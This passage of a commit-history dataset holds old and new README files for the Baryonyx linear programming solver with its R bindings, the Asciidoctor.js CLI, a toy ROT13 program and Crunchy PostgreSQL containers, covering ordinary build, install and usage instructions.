init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n\noptimize_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n----\n\n=== Usage\n\nApply morris method to found useful parameters:\n\n[source,R]\n----\nlibrary(rbaryonyx)\nlibrary(sensitivity)\n\nfactors = c(\"theta\", \"delta\", \"constraint_order\", \"kappa_min\", \"kappa_step\",\n \"kappa_max\", \"alpha\", \"w\", \"norm\", \"pushing_k_factor\",\n \"pushing_objective_amplifier\", \"pushes_limit\", \"pushing_iteration_limit\",\n \"float_type\")\n\nbounds = data.frame(\n min=c(\n 0, # theta\n 0, # delta\n 0, # constraint_order\n 0, # kappa_min\n 1e-16, # kappa_step\n 1.0, # kappa_max\n 0.0, # alpha\n 50, # w\n 0, # norm\n 0.1, # pushing_k_factor\n 1.0, # pushing_objective_amplifier\n 10, # pushes_limit\n 20, # pushing_iteration_limit\n 0, # init_policy\n 0.0, # init_random\n 0\n ), # float_type\nmax=c(\n 1, # theta\n 0, # delta\n 4, # constraint_order\n 0.1, # kappa_min\n 1e-1, # kappa_step\n 1.0, # kappa_max\n 2.0, # alpha\n 500, # w\n 4, # norm\n 1, # pushing_k_factor\n 10.0, # pushing_objective_amplifier\n 100, # pushes_limit\n 200, # pushing_iteration_limit\n 2, # init_policy\n 1.0, # init_random\n 2)) # float_type\n\nrownames(bounds) <- factors\n\nmorrisDesign <- morris(model = NULL,\n factors = factors,\n r = 10,\n design=list(type=\"oat\", levels=10, grid.jump=5),\n binf = bounds$min,\n bsup = bounds$max,\n scale=TRUE)\n\nsolve_lp <- function(x, file_path, limit=10000, time_limit=10, seed=123456789, thread=1) {\n r <- rbaryonyx::solve_01lp_problem(file_path = file_path,\n limit = limit,\n theta = x[\"theta\"],\n delta = x[\"delta\"],\n constraint_order = x[\"constraint_order\"],\n kappa_min = x[\"kappa_min\"],\n kappa_step = x[\"kappa_step\"],\n kappa_max = x[\"kappa_max\"],\n alpha = x[\"alpha\"],\n w = x[\"w\"],\n time_limit = time_limit,\n seed = seed,\n thread = thread,\n norm = x[\"norm\"],\n pushing_k_factor = x[\"pushing_k_factor\"],\n pushing_objective_amplifier = x[\"pushing_objective_amplifier,\"],\n pushes_limit = x[\"pushes_limit\"],\n pushing_iteration_limit = x[\"pushing_iteration_limit\"],\n init_policy = x[\"init_policy\"],\n init_random = x[\"init_random\"],\n float_type = x[\"float_type\"])\n\n return(r)\n}\n\nr = apply(morrisDesign$X, 1, solve_lp, file_path=\"verger_5_5.lp\", thread=1, limit=10000, time_limit=10, seed=123456789)\n\nmorrisDesign$Y <- r\nmu <- apply(morrisDesign$X,2,mean)\nmu.star <- apply(morrisDesign$X, 2, function(x) mean(abs(x)))\nsigma <- apply(morrisDesign$ee, 2, sd)\n\napply(morrisDesign$X, 2, function(v) plot(factor(v), r))\n----\n\nUse RGenoud method to found best paramter values:\n\n[source,R]\n----\nlibrary(rgenoud)\nlibrary(rbaryonyx)\nlibrary(parallel)\n\noptim_gen_lp <- function(x) {\n r <- rbaryonyx::optimize_01lp_problem(\n file_path = \"rail507pre.lp\",\n limit = -1,\n theta = x[1],\n delta = x[2],\n constraint_order = 0,\n kappa_min = x[3],\n kappa_step = x[4],\n kappa_max = 1.0,\n alpha = 1.0,\n w = 60,\n time_limit = 10,\n seed = 123654785,\n thread = 4,\n norm = 0,\n pushing_k_factor = 1,\n pushing_objective_amplifier = 10,\n pushes_limit = 20,\n pushing_iteration_limit = 50,\n init_policy = 0,\n init_random = 0.5,\n float_type = 1,\n verbose = FALSE)\n\n return(r)\n}\n\nd = matrix(c(0.0, 0.00001, 0.0, 1e-10,\n 1.0, 0.001, 0.2, 1e-4),\n nrow=4, ncol=2)\n\ns = c(0.5, 0.003226, 0.1, 1e-8)\n\nno_cores <- detectCores() - 1\ncl <- makeCluster(no_cores, outfile=\"debug.txt\")\n\nclaw1 <- genoud(optim_gen_lp, nvars=4,\n Domains=d,\n starting.values=s,\n cluster=cl,\n boundary.enforcement=1,\n max=FALSE, pop.size=10)\n----\n\n\n=== Upgrade\n\nTo upgrade to the latest version of rbaryonyx, under bash (or\nequivalent):\n\n[source,bash]\n----\ncd baryonyx\ngit pull -r <1>\ncd build\nmake -j4 <2>\nmake install\nR CMD REMOVE rbaryonyx <3>\ncd rbaryonyx\nRscript -e 'library(Rcpp); compileAttributes(\".\")'\nRscript -e 'library(devtools); devtools::document()'\ncd ..\nR CMD build rbaryonyx <4>\nR CMD INSTALL rbaryonyx_1.0.tar.gz\n----\n\n<1> Update the baryonyx and rbaryonyx from Git\n<2> Build and install baryonyx\n<3> Remove old rbaryonyx package\n<4> Build and install\n","old_contents":"= Baryonyx\nGauthier Quesnel <gauthier.quesnel@inra.fr>\nv0.5.x, 2019-??-??\n:toc:\n:homepage: https:\/\/github.com\/quesnel\/baryonyx\/\n\nhttps:\/\/en.wikipedia.org\/wiki\/Baryonyx[Baryonyx] is an integer and binary linear\nprogramming solver based on the http:\/\/www.cse.chalmers.se\/~dag\/[Dag Wedelin]\nheuristic.\n\n[width=\"15%\"]\n|============\n| https:\/\/travis-ci.org\/quesnel\/baryonyx[image:https:\/\/travis-ci.org\/quesnel\/baryonyx.png?branch=master[Build Status]] | https:\/\/ci.appveyor.com\/project\/quesnel\/baryonyx?branch=master[image:https:\/\/ci.appveyor.com\/api\/projects\/status\/github\/quesnel\/baryonyx?branch=master&svg=true[Build Status]]\n|============\n\nCopyright \u00a9 2017-2019 http:\/\/www.inra.fr\/en[INRA]\n\nThe software is released under the MIT license. See the LICENSE file.\n\n== Baryonyx\n\n=== Requirements and recommended\n\n* `cmake` (\u2265 3.11)\n* $$C++$$ compiler with $$C++17$$ support:\n** `gcc` \u2265 7 (https:\/\/www.gnu.org\/software\/gcc\/projects\/cxx-status.html[notes])\n** `clang` \u2265 5 (https:\/\/clang.llvm.org\/cxx_status.html[notes])\n** `visual studio 2017 15.9` with the latest patchs of 2018 (https:\/\/docs.microsoft.com\/en-us\/visualstudio\/releasenotes\/vs2017-relnotes[notes])\n\nFor recent Debian GNU\/Linux and Ubuntu derivatives (remove clang to\nonly use gcc):\n\n[source,bash]\n....\napt-get install build-essential cmake clang\n....\n\nFor Windows, install the https:\/\/www.cmake.org[CMake program] and\nVisual Studio 2017 (MSVC). You may also install the vcpkg program to\ninstall nlopt and other dependencies.\n\n* `nlopt` library - optimization library to automatic parametrization\n of the Baryonyx solver parameters.\n\n=== First installation\n\nFirst, we clone Baryonyx git repository and the submodule.\n\n....\ngit clone https:\/\/github.com\/quesnel\/baryonyx.git\ncd baryonyx\ngit submodule update --init --recursive\n....\n\nDefault, Baryonyx provides a shared library `libbaryonyx-0.4.so` (with\nhidden symbol), a static library `libbaryonyx-0.4.a` (all symbols are\npublic) and an executable `baryonyx-0.4`. To compile and install in\nthe default CMake install directory:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\nPrevious command line install Baryonyx program and library into the\n`\/usr\/local` prefix. If you install into another directory, you need\nto define three environment variables (into your `.bashrc` or\nequivalent). If you install into `$HOME\/usr` for example, you need to\ndefine in your `.bashrc`:\n\n....\nexport PATH=$PATH:$HOME\/usr\/bin\nexport LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$HOME\/usr\/lib\nexport PKG_CONFIG_PATH=$PKG_CONFIX_PATH:$HOME\/usr\/lib\/pkgconfig\n....\n\nThen run the following commands:\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\nmake install\n....\n\nTo override the default build flags, remove the `CMAKE_BUILD_TYPE`\nparameter and override the `CXXFLAGS` as follow:\n\n....\nexport CXX=g++-8\nexport CXXFLAGS='-Wall -Wextra -Werror -ftree-vectorize -mmmx -msse -msse2 -msse3 -O3'\ncmake -DCMAKE_INSTALL_PREFIX=$HOME\/usr ..\n....\n\nThe CMake script provide parameters to control debug, log facility and\noptimization.\n\n.Table CMake Command line parameters (cmake -DWITH_LOG=OFF ...)\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| default| summary\n\n| WITH_LOG\n| ON\n| Enable log message on standard output.\n\n| WITH_DEBUG\n| ON\n| Enable maximum debug function and add more log message. Be careful, this mode slow down computation.\n\n| WITH_FULL_OPTIMIZATION\n| OFF\n| Enable optimal computation but remove some control on float and control.\n|===\n\n=== Update installation\n\nFirst, we need to update the Git repository with the following\ncommands:\n\n....\ncd baryonyx\ngit pull -r\ngit submodule update --recursive\n....\n\nThen go to the build directory and restart compilation and\ninstallation :\n\n....\ncd baryonyx\nmkdir build\ncd build\ncmake -DCMAKE_BUILD_TYPE=Release ..\nmake install\n....\n\n== Usage\n\n=== Solver & Optimizer\n\nTo run Baryonyx in solver mode (i.e. trying to valid all constraints):\n\n....\nbaryonyx-0.4 file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.4 -o file.lp\n....\n\nTo run baryonyx into the heuristic model (i.e. trying to valid all\nconstraints and optimize the solution), add a `-o` or `--optimize`\noption to the command line:\n\n....\nbaryonyx-0.4 -o file.lp\n....\n\nThe Baryonyx solver have many parameters. Some parameters are global,\nsome specific for the optimization algorithms.\n\n.Table Command line global parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| --help -h\n|\n| Show help message\n\n| --quiet -q\n|\n| Remove many console output\n\n| --bench [name]\n|\n| Start benchmark. Need csv input files\n\n| --optimize -O\n|\n| Start Baryonyx in optimization mode, default is to use the solve mode\n\n| --limit -l -plimit\n| integer\n| number of loop to stop algorithm\n\n| --verbose -v\n| integer\n| verbose level from 0 (very very verbose in debug mode) to 7 (quiet)\n\n| --disable-preprocessing -np\n|\n| disable the use of preprocessing\n\n| --random\n|\n| use the pure random solver (for benchmark) instead of the Bastert\/Wedelin algorithm.\n\n| --auto[:= ]value\n| string\n| Select the type of optimizer meta-heuristic. Values are:\n\n* `none` without specific algorithm.\n* `manual` tries to update parameters to found best solution.\n* `nlopt` tries to update parameters to found best solution using nlopt library and the Nelder Mead algorithm.\n* `branch` split recursively original problem to found best solution.\n* `branch-manual` mix branch and manual algorithm.\n* `branch-nlopt` mix branch and nlopt algorithm.\n\n|===\n\nTo assign parameters to solver or optimizer algorithms, use the `-p\n[name]:value` syntax in the command line:\n\n.Table Command line parameters\n[cols=\"1,1,5a\", options=\"header\"]\n|===\n|name| type| summary\n\n| time-limit\n| real\n| time in second to stop algorithm or stop the optimize mode\n\n| limit\n| integer\n| number of loop to stop algorithm\n\n| w\n| double\n| warmup-iterator [0, 1] A percentage of `limit` loop and if w is greater than 1, the number of loop without updating kappa\n\n| theta\n| real\n| history parameters [0, 1[\n\n| delta\n| real\n| influence parameters [0, +oo[\n\n| kappa-min\n| real\n| kappa minimal value [0, kappa-max\n\n| kappa-step\n| real\n| kappa updater [0, +oo[\n\n| kappa-max\n| real\n| kappa maximal value ]kappa-min, +oo[ to stop algorithm\n\n| alpha\n| real\n| adaptiveness parameter\n\n| pushing-k-factor\n| integer\n| use to lower the kappa using the push system\n\n| pushes-limit\n| integer\n| number of push before stopping the algorithm\n\n| pushing-objective-amplifier\n| real\n| use to make r more similar to costs\n\n| pushing-iteration-limit\n| integer\n| number of loop before trying a new push\n\n| norm\n| string\n| Select the cost normalization function\n\n* `none` let unmodified costs\n* `l1` use the l1-norm function\n* `l2` use the l2-norm function\n* `random` try to avoid equal cost\n* `inf` (default): use the infinity norm\n\n| constraint-order\n| string\n| Remaining constraints order. Values are:\n\n* `none` (default): use the lp format constraint order\n* `reversing`: reverse the lp format constraint order\n* `random-sorting`: random the remaining constraint list\n* `infeasibility-decr`: compute infeasibility constraint in decremental order\n* `infeasibility-incr`: compute infeasibility constraint in incremental order\n* `lagrangian-decr`: sort violated constraints according to the Lagrangian multiplier values in decremental order\n* `lagrangian-incr`: sort violated constraints according to the Lagrangian multiplier values in incremental order\n* `pi-sign-change`: random the remaining constraint list if the lagrangian multipliers signs have changed\n* `cycle`: switch the constraint order after each `update_row`. Starts from `none` to `pi-sign-change`.\n\n| preprocessing\n| string\n| Constraints matrix A order. Values are:\n\n* `none`: Use the raw_problem (or lp file) order for constraints and variables.\n* `memory`: Default, use the raw_problem (or lp file) order for constraints but sort the variables to improve the memory cache efficiency.\n* `less_greater_equal`: sort constraints according to their type (first less and finally greater then equal) and sort variable to improve the memory cache efficiency.\n* `less_equal_greater`: sort constraints according to their type (first less\n and finally equal then greater) and sort variable to improve the memory cache\n efficiency.\n* `greater_less_equal`: sort constraints according to their type (first greater\n then less and finally equal) and sort variable to improve the memory cache\n efficiency.\n* `greater_equal_less`: sort constraints according to their type (first greater\n then equal and finally less) and sort variable to improve the memory cache\n efficiency.\n* `equal_less_greater`: sort constraints according to their type (first equal\n then less and finally greater) and sort variable to improve the memory cache\n efficiency.\n* `equal_greater_less`: sort constraints according to their type (first equal\n then greater and finally less) and sort variable to improve the memory cache\n efficiency.\n* `p1`: reserved\n* `p2`: reserved\n* `p3`: reserved\n* `p4`: reserved\n\n| observation\n| string\n| Select the type of observation mechanism (only in solve mode)\n\n* `none` no observation (default).\n* `pnm` produce picture files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n* `file` produce CSV files for the P matrix (one per loop) and Pi vector (Lagrangian multipliers) each loop\n\n| floating-point_type\n| string\n| Select the type of real use internally in the solvers. Values are:\n\n* `float` float (32 bits)\n* `double` double (64 bits)\n* `longdouble` long double (84 or 128 bits)\n\n| print-level\n| integer\n| show information if greater than 0\n\n| init-policy\n| string\n| Change the initialization and reinitialization policy of the solution vector. Values are:\n\n* `bastert`: for each variable (or at `init-policy-random` rate) use cost\n values to set or unset variable.\n* `pessimistic-solve`: found a solution for each (or at `init-policy-random`\n rate) constraints. For soft constraints, affect one to strict minimum\n variables.\n* `optimistic-solve`: found a solution for each (or or `init-policy-random`\n rate) constraints. For soft constraints, affect one to the maximum variables\n that valid the constraint.\n* `cycle` (default): Only for the optimization mode, start with the\n `pessimistic-solve` mode and change to `bastert` then `pessimistic-solve`\n mode. The change between mode is done if and only if three times,\n optimization fails to improve the current best solution.\n\n| init-policy-random\n| real\n| [0-1] (default, 0.5) parameter of the bernoulli's law to be used in conjunction with the `init-policy` parameter. If the law returns 1, it uses the `init-policy` algorithm to initialize `X_i`, 0 means use a toss up to choose 0 or 1 according to the `init-random` value.\n\n| init-random\n| real\n| [0-1] (default, 0.5) parameter _p_ of the bernoulli's law used when 0 occurs with the `init-policy-random`.\n\n| storage-type\n| string\n| Change the solution storage policy for the optimizer mode.\n\n* `one` (default): stores only the best solution found.\n* `bound`: stores the best and the bad solution found.\n* `five`: stores the best five solution found.\n\n|===\n\nFor example:\n\n....\nbaryonyx -p limit:1000000 lib\/test\/prevl1.lp\nbaryonyx -p limit:-1 -p kappa-min:0.2 lib\/test\/prevl1.lp\n....\n\n=== Benchmark\n\nBaryonyx permits to run benchmark on a set of problems described in a `csv`\nfiles. This option is available using the `--bench [name]` option and `csv`\nfiles. All Baryonyx parameters are available to perform the benchmark.\n\nFor example:\n\n....\nbaryonyx --bench bx-0.4 -pdelta:0.01 -ptime-limit:60 spp.csv\n....\n\nThe benchmark mode updates the `csv` file with results of computation. The\n`csv` format is:\n\n....\nfile optimum status cplex lsp bx-0.2 <1>\ncplex:\nlsp: <2>\nbx-0.2:\nscp410 optimum 514 514 514 804 <3>\nscp41 optimum 429 429 429 627\nscp42 optimum 512 512 512 934\n....\n\n<1> The header: three columns mandatory (`file`, `optimum`, `status`) and one\nsolver per column. In this example, cplex, local solver and baryonyx 0.2.\n<2> The description part: one line per solver to describe version and parameter\nfor example.\n<3> Finally, one line per solve: model name (with or without extension), status\n(optimum\/feasible), best solution found and solver's solution. `inf` can be use\nto indicate no solution found.\n\nIn benchmark directory, some files are provided and a script to download\nclassical problem.\n\n== R\n\nTo use rbaryonyx, you must compile and install the baryonyx library.\nFollow the previous section and install R.\n\n=== Installation\n\nThe R rbaryonyx package requires several packages. Then, under a R terminal:\n\n....\ncd baryonyx\/rbaryonyx\nR CMD REMOVE rbaryonyx <1>\n\ninstall.packages(\"roxygen2\") <2>\ninstall.packages(\"Rcpp\")\ninstall.packages(\"devtools\")\n\nlibrary(Rcpp) <3>\ncompileAttributes(\".\")\nlibrary(devtools)\ndevtools::document()\ndevtools::build()\ndevtools::install()\n\nlibrary(rbaryonyx) <4>\n?rbaryonyx <5>\n....\n\n<1> Remove previous installed version of rbaryonyx\n<2> Install the dependencies of rbaryonyx\n<3> Build the rbaryonyx package\n<4> Load the package\n<5> The help\n\n=== API\n\nTwo functions are provided to solve or optimize 01 linear programming\nproblem. Parameters are the same as `C++ API`. These function returns a\nscalar:\n\n* If a solution is found:\n** if the problem is a minimization: the value of the solution found.\n** if the problem is a maximization: the inverse of the solution found.\n* If no solution is found, we use the limits of the objective function (minimal\n and maximal value possible.\n** if the problem is a minimization: the maximal value possible + the remaining\n constraints.\n** if the problem is a maximization: the inverse of the minimal value possible\n + the remaining constraints.\n* If a error occurred (not enough memory, problem error etc.):\n** if the problem is a minimization: the maximal value possible + the number of\n constraints .\n** if the problem is a maximization: the inverse of the minimal value possible\n + the number of constraints.\n\n[source,R]\n----\nsolve_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n\noptimize_01lp_problem <- function(file_path, limit = 1000L, theta = 0.5,\n delta = 1e-4, constraint_order = 0L, kappa_min = 0.1, kappa_step = 1e-4,\n kappa_max = 1.0, alpha = 1.0, w = 500L, time_limit = 10.0, seed = -1L,\n thread = 1L, norm = 4L, pushing_k_factor = 0.9,\n pushing_objective_amplifier = 5.0, pushes_limit = 10L,\n pushing_iteration_limit = 20L, init_policy = 0L, init_random = 0.5,\n float_type = 1L, verbose = TRUE)\n----\n\n=== Usage\n\nApply morris method to found useful parameters:\n\n[source,R]\n----\nlibrary(rbaryonyx)\nlibrary(sensitivity)\n\nfactors = c(\"theta\", \"delta\", \"constraint_order\", \"kappa_min\", \"kappa_step\",\n \"kappa_max\", \"alpha\", \"w\", \"norm\", \"pushing_k_factor\",\n \"pushing_objective_amplifier\", \"pushes_limit\", \"pushing_iteration_limit\",\n \"float_type\")\n\nbounds = data.frame(\n min=c(\n 0, # theta\n 0, # delta\n 0, # constraint_order\n 0, # kappa_min\n 1e-16, # kappa_step\n 1.0, # kappa_max\n 0.0, # alpha\n 50, # w\n 0, # norm\n 0.1, # pushing_k_factor\n 1.0, # pushing_objective_amplifier\n 10, # pushes_limit\n 20, # pushing_iteration_limit\n 0, # init_policy\n 0.0, # init_random\n 0\n ), # float_type\nmax=c(\n 1, # theta\n 0, # delta\n 4, # constraint_order\n 0.1, # kappa_min\n 1e-1, # kappa_step\n 1.0, # kappa_max\n 2.0, # alpha\n 500, # w\n 4, # norm\n 1, # pushing_k_factor\n 10.0, # pushing_objective_amplifier\n 100, # pushes_limit\n 200, # pushing_iteration_limit\n 2, # init_policy\n 1.0, # init_random\n 2)) # float_type\n\nrownames(bounds) <- factors\n\nmorrisDesign <- morris(model = NULL,\n factors = factors,\n r = 10,\n design=list(type=\"oat\", levels=10, grid.jump=5),\n binf = bounds$min,\n bsup = bounds$max,\n scale=TRUE)\n\nsolve_lp <- function(x, file_path, limit=10000, time_limit=10, seed=123456789, thread=1) {\n r <- rbaryonyx::solve_01lp_problem(file_path = file_path,\n limit = limit,\n theta = x[\"theta\"],\n delta = x[\"delta\"],\n constraint_order = x[\"constraint_order\"],\n kappa_min = x[\"kappa_min\"],\n kappa_step = x[\"kappa_step\"],\n kappa_max = x[\"kappa_max\"],\n alpha = x[\"alpha\"],\n w = x[\"w\"],\n time_limit = time_limit,\n seed = seed,\n thread = thread,\n norm = x[\"norm\"],\n pushing_k_factor = x[\"pushing_k_factor\"],\n pushing_objective_amplifier = x[\"pushing_objective_amplifier,\"],\n pushes_limit = x[\"pushes_limit\"],\n pushing_iteration_limit = x[\"pushing_iteration_limit\"],\n init_policy = x[\"init_policy\"],\n init_random = x[\"init_random\"],\n float_type = x[\"float_type\"])\n\n return(r)\n}\n\nr = apply(morrisDesign$X, 1, solve_lp, file_path=\"verger_5_5.lp\", thread=1, limit=10000, time_limit=10, seed=123456789)\n\nmorrisDesign$Y <- r\nmu <- apply(morrisDesign$X,2,mean)\nmu.star <- apply(morrisDesign$X, 2, function(x) mean(abs(x)))\nsigma <- apply(morrisDesign$ee, 2, sd)\n\napply(morrisDesign$X, 2, function(v) plot(factor(v), r))\n----\n\nUse RGenoud method to found best paramter values:\n\n[source,R]\n----\nlibrary(rgenoud)\nlibrary(rbaryonyx)\nlibrary(parallel)\n\noptim_gen_lp <- function(x) {\n r <- rbaryonyx::optimize_01lp_problem(\n file_path = \"rail507pre.lp\",\n limit = -1,\n theta = x[1],\n delta = x[2],\n constraint_order = 0,\n kappa_min = x[3],\n kappa_step = x[4],\n kappa_max = 1.0,\n alpha = 1.0,\n w = 60,\n time_limit = 10,\n seed = 123654785,\n thread = 4,\n norm = 0,\n pushing_k_factor = 1,\n pushing_objective_amplifier = 10,\n pushes_limit = 20,\n pushing_iteration_limit = 50,\n init_policy = 0,\n init_random = 0.5,\n float_type = 1,\n verbose = FALSE)\n\n return(r)\n}\n\nd = matrix(c(0.0, 0.00001, 0.0, 1e-10,\n 1.0, 0.001, 0.2, 1e-4),\n nrow=4, ncol=2)\n\ns = c(0.5, 0.003226, 0.1, 1e-8)\n\nno_cores <- detectCores() - 1\ncl <- makeCluster(no_cores, outfile=\"debug.txt\")\n\nclaw1 <- genoud(optim_gen_lp, nvars=4,\n Domains=d,\n starting.values=s,\n cluster=cl,\n boundary.enforcement=1,\n max=FALSE, pop.size=10)\n----\n\n\n=== Upgrade\n\nTo upgrade to the latest version of rbaryonyx, under bash (or\nequivalent):\n\n[source,bash]\n----\ncd baryonyx\ngit pull -r <1>\ncd build\nmake -j4 <2>\nmake install\nR CMD REMOVE rbaryonyx <3>\ncd rbaryonyx\nRscript -e 'library(Rcpp); compileAttributes(\".\")'\nRscript -e 'library(devtools); devtools::document()'\ncd ..\nR CMD build rbaryonyx <4>\nR CMD INSTALL rbaryonyx_1.0.tar.gz\n----\n\n<1> Update the baryonyx and rbaryonyx from Git\n<2> Build and install baryonyx\n<3> Remove old rbaryonyx package\n<4> Build and install\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ddf2793d211586b493c424c403679f375bfabaf8","subject":"Use Markdown compatible syntax","message":"Use Markdown compatible syntax\n","repos":"asciidoctor\/asciidoctor-cli.js,asciidoctor\/asciidoctor-cli.js","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Asciidoctor.js CLI\n\nifdef::env-github[]\nimage:https:\/\/img.shields.io\/travis\/asciidoctor\/asciidoctor-cli.js\/master.svg[Travis build status, link=https:\/\/travis-ci.org\/asciidoctor\/asciidoctor-cli.js]\nimage:https:\/\/img.shields.io\/npm\/v\/@asciidoctor\/cli.svg[npm version, link=https:\/\/www.npmjs.org\/package\/@asciidoctor\/cli]\nendif::[]\n\nThe Command Line Interface (CLI) for Asciidoctor.js.\n\nInstall Asciidoctor.js globally and you'll have access to the `asciidoctor` command anywhere on your system:\n\n $ npm i -g asciidoctor\n\nType `asciidoctor --help` for more information.\n","old_contents":"= Asciidoctor.js CLI\n\nifdef::env-github[]\nimage:https:\/\/img.shields.io\/travis\/asciidoctor\/asciidoctor-cli.js\/master.svg[Travis build status, link=https:\/\/travis-ci.org\/asciidoctor\/asciidoctor-cli.js]\nimage:https:\/\/img.shields.io\/npm\/v\/@asciidoctor\/cli.svg[npm version, link=https:\/\/www.npmjs.org\/package\/@asciidoctor\/cli]\nendif::[]\n\nThe Command Line Interface (CLI) for Asciidoctor.js.\n\nInstall Asciidoctor.js globally and you'll have access to the `asciidoctor` command anywhere on your system:\n\n $ npm i -g asciidoctor\n\nType `asciidoctor --help` for more information.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d5544be05177ccf6ed28a106116ea84f642a109c","subject":"Update documentation.","message":"Update documentation.\n","repos":"oneonestar\/uppercaser","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= Linux System Programming - Rotate by 13 places (ROT13)\nA small program that performs rotate by 13 places ``encryption''.\n\n== Compile & Run\n[source,bash]\n----\n$ git clone https:\/\/github.com\/oneonestar\/LSP_ROT13.git\n$ cd LSP_ROT13\n$ mkdir build\n$ cmake ..\n$ make\n$ .\/ROT13\n----\n\n== Usage\n----\nUsage: ROT13 [OPTION...] [FILE...]\n\nROT13 -- Rotate by 13 places encryption\n\n -r, --reverse Reverse shift (right shift)\n -s, --shift=AMOUNT Shift by this AMOUNT (default 13)\n -v, --verbose Verbose Mode\n -?, --help Give this help list\n --usage Give a short usage message\n -V, --version Print program version\n\nMandatory or optional arguments to long options are also mandatory or optional\nfor any corresponding short options.\n----\nTIP: If no FILE provided, program will read from standard input.\n\n== Example\n[source,bash]\n----\n$ .\/ROT13 #left shift of 13, reading from stdin\n$ .\/ROT13 -s 10 #left shift of 10\n$ .\/ROT13 -r -s 8 #right shift of 8\n$ .\/ROT13 Makefile #encrypt the Makefile, output as Makefile.out\n----\n\n== Bugs & Feedback\nReport bugs to Star Poon <oneonestar@gmail.com>.\n","old_contents":"= Linux System Programming - Rotate by 13 places (ROT13)\nA small program that performs rotate by 13 places ``encryption''.\n\n== Usage\n----\nUsage: ROT13 [OPTION...] [FILE...]\nROT13 -- Rotate by 13 places encryption\n\n -r, --reverse Reverse shift (right shift).\n -s, --shift=AMOUNT Shift by this AMOUNT. (default 13)\n -?, --help Give this help list\n --usage Give a short usage message\n -V, --version Print program version\n\nMandatory or optional arguments to long options are also mandatory or optional\nfor any corresponding short options.\n\nReport bugs to Star Poon <oneonestar@gmail.com>.\n----\nTIP: If no FILE provided, program will read standard input.\n\n== Compile & Run\n[source,bash]\n----\n$ git clone https:\/\/github.com\/oneonestar\/LSP_ROT13.git\n$ cd LSP_ROT13\n$ mkdir build\n$ cmake ..\n$ make\n$ .\/ROT13\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"313f93074212b2de68e332fa2adc0cb0adc98a53","subject":"update readme - supported versions","message":"update readme - supported versions\n\nupdate the wording on the supported versions","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"README.adoc","new_file":"README.adoc","new_contents":"== Crunchy PostgreSQL Containers\nv1.4.1, {docdate}\n\nimage::docs\/crunchy_logo.png?raw=true[]\n\n\nCrunchy Container Suite provides Docker containers that enable\nrapid deployment of PostgreSQL, including administration and\nmonitoring tools. Multiple styles of deploying PostgreSQL clusters\nare supported.\n\nThe containers will execute in the following environments:\n\n * Docker 1.12 and above\n * Openshift 3.4 and above\n * Kubernetes 1.5 and above\n\nThe project includes the following containers:\n\n * link:docs\/containers.adoc#crunchy-postgres[crunchy-postgres] - executes Postgres\n * link:docs\/containers.adoc#crunchy-postgres-gis[crunchy-postgres-gis] - executes Postgres plus the PostGIS extensions\n * link:docs\/containers.adoc#crunchy-backup[crunchy-backup] - performs a full database backup\n * link:docs\/containers.adoc#crunchy-pgpool[crunchy-pgpool] - executes pgpool\n * link:docs\/containers.adoc#crunchy-pgbadger[crunchy-pgbadger] - executes pgbadger\n * link:docs\/containers.adoc#crunchy-watch[crunchy-watch] - performs a form of automated failover\n * link:docs\/metrics.adoc#crunchy-collect[crunchy-collect] - collects Postgres metrics\n * link:docs\/metrics.adoc#crunchy-prometheus[crunchy-prometheus] -stores Postgres metrics\n * link:docs\/metrics.adoc#crunchy-grafana[crunchy-grafana] - graphs Postgres metrics\n * link:docs\/containers.adoc#crunchy-pgbouncer[crunchy-pgbouncer] - pgbouncer connection pooler and simple form of failover\n * link:docs\/containers.adoc#crunchy-pgadmin4[crunchy-pgadmin4] - pgadmin4 web application\n * link:docs\/containers.adoc#crunchy-dba[crunchy-dba] - implements a cron scheduler to perform simple DBA tasks\n * link:docs\/containers.adoc#crunchy-upgrade[crunchy-upgrade] - allows you to perform a major postgres upgrade using pg_upgrade\n * link:docs\/containers.adoc#crunchy-backrest-restore[crunchy-backrest-restore] - allows you to perform a pgbackrest restore\n\n\nimage::docs\/containers.png?raw=true[]\n\nFor Kubernetes users of these containers, there is an associated\nproject worth taking a look at that uses the containers found\nin this repo and provides a higher level automation.\nThat project is link:https:\/\/github.com\/crunchydata\/postgres-operator[PostgresOperator]\n\n=== Installation\n\nComplete build and install documentation is found here: link:docs\/install.adoc[Install Docs]. The provided Dockerfiles build the containers\non a Centos 7 base image and use the community PostgreSQL RPMs.\n\nCrunchy provides a commercially supported version of these containers\nbuilt upon RHEL 7 and the Crunchy supported PostgreSQL. Contact 